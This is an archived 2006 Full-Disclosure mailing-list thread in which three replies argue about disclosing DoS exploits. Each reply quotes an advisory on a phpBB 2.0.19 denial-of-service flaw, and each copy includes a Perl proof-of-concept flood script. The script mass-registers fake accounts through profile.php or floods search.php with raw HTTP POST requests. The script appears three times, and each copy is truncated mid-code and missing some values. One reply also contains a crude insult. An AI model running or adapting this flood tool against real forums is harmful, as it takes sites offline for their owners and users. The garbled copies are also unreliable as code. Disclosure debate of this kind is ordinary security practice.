RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
No, I do believe full-disclosure to be the best
method. In the case of DoS attacks, I think a point should be made of
making sure the vendor is informed, and a patch available before disclosed, then
I beleive itw down to the author's discretion when he releases the exploit, even
if its a PoC.
From: poo [mailto:[EMAIL PROTECTED]
Sent: 26 January 2006 11:31To: Edward
PearsonCc: full-disclosure@lists.grok.org.ukSubject: Re:
[Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS
Vulnerability
so what youre saying is that DoS exploits shouldnt be
disclosed?
On 1/25/06, Edward
Pearson <[EMAIL PROTECTED]>
wrote:
The less
said about DoS attacks the better. A tactic mostly employed by
asexual teenagers who live in their parent's basement and call themselves
"h4x0rz".
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of
h4cky0uSent: 25 January 2006 14:44To: full-disclosure@lists.grok.org.ukCc: bugtraq@securityfocus.comSubject:
[Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS
Vulnerability
-- HYSA-2006-001 h4cky0u.org Advisory 010
--Date - Wed Jan 25 2006
TITLE:==phpBB 2.0.19 search.php and profile.php DOS VulnerabilitySEVERITY:=HighSOFTWARE:=phpBB 2.0.19 and priorINFO:
=phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.Support Website :
http://www.phpbb.com
BUG DESCRIPTION:The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-profile.php << By registering as many users as you can.
search.php << By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ## Recoded by: mix2mix and Elioni of
http://ahg-khf.org## And h4cky0u Security Forums (
http://h4cky0u.org) ## Name: phpBBDoSReloaded## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions## Ported to perl by g30rg3_x## Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums ); print q(Host |without-> http://www.| );
$host = ; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth = ; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = ; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X"
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "&email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit
"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80",
Proto => "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Conten
Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
so what youre saying is that DoS exploits shouldnt be disclosed?
On 1/25/06, Edward Pearson <[EMAIL PROTECTED]> wrote:
The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parent's basement and call themselves "h4x0rz".
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] On Behalf Of h4cky0u
Sent: 25 January 2006 14:44To: full-disclosure@lists.grok.org.ukCc:
bugtraq@securityfocus.comSubject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php
DOS Vulnerability
-- HYSA-2006-001 h4cky0u.org Advisory 010
--Date - Wed Jan 25 2006
TITLE:==phpBB 2.0.19 search.php and profile.php DOS VulnerabilitySEVERITY:=HighSOFTWARE:=phpBB 2.0.19 and priorINFO:
=phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.Support Website :
http://www.phpbb.com
BUG DESCRIPTION:The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-profile.php << By registering as many users as you can.
search.php << By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ## Recoded by: mix2mix and Elioni of
http://ahg-khf.org## And h4cky0u Security Forums (
http://h4cky0u.org) ## Name: phpBBDoSReloaded## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions## Ported to perl by g30rg3_x## Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums ); print q(Host |without-> http://www.| );
$host = ; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth = ; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = ; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X"
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "&email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit
"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80",
Proto => "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; }
## Tipi 2-shë për Kërkim(Flood) } elsif ($type == 2){ while($x != ) { ## Final Search String to Send $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr =
RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
The less said about DoS attacks the better. A
tactic mostly employed by asexual teenagers who live in their parent's
basement and call themselves "h4x0rz".
From:
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
h4cky0uSent: 25 January 2006 14:44To:
full-disclosure@lists.grok.org.ukCc:
bugtraq@securityfocus.comSubject: [Full-disclosure] HYSA-2006-001
phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
-- HYSA-2006-001 h4cky0u.org Advisory 010--Date - Wed Jan 25 2006
TITLE:==phpBB 2.0.19 search.php and profile.php DOS VulnerabilitySEVERITY:=HighSOFTWARE:=phpBB 2.0.19 and priorINFO:
=phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.Support Website : http://www.phpbb.com
BUG DESCRIPTION:The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-profile.php << By registering as many users as you can.
search.php << By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ## Recoded by: mix2mix and Elioni of
http://ahg-khf.org## And h4cky0u Security Forums (http://h4cky0u.org) ## Name: phpBBDoSReloaded## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions## Ported to perl by g30rg3_x## Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums ); print q(Host |without-> http://www.| );
$host = ; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth = ; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = ; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X"
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "&email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit
"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80",
Proto => "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; }
## Tipi 2-shë për Kërkim(Flood) } elsif ($type == 2){ while($x != ) { ## Final Search String to Send $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host",
PeerPort => "80", Proto => "tcp",
